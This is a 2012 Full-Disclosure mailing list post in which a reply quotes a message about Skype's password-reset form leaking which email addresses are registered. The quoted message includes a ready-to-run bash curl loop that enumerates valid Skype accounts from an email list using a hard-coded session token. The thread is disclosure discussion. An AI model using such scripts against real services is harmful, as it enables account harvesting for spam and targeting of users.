Oracle attacks? See into the future? Padding oracle attacks? Oracle SQL injections?
On Wed, Nov 14, 2012 at 3:44 PM, klondike <klond...@klondike.es> wrote: > El 14/11/12 11:20, Kirils Solovjovs escribió: > > The team has worked around this and are now trying to fix the > > bug/feature. :) > > > > > http://www.reddit.com/r/netsec/comments/13664q/skype_vulnerability_allowing_hijacking_of_any/ > Well, they also seem to be vulnerable to oracle attacks against the > e-mail database through the same forgotten password form so I wouldn't > be surprised if an spammer has already been exploiting this. > > Below is the classical bash script to exploit it, just input a newline > separated list of e-mails and it will send the request and filter those > which are clearly not in the database: > $ while read mail trash; do curl > 'https://login.skype.com/account/password-reset-request' -s -o- -b > "skype-session-token=336ff76c68bf17b54eb0d2dc81f8bd6f1500a7fd" -d > "email=$mail&session_token=336ff76c68bf17b54eb0d2dc81f8bd6f1500a7fd" | > fgrep "The email address you entered is invalid." > /dev/null || echo > $mail; done > > klondike > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
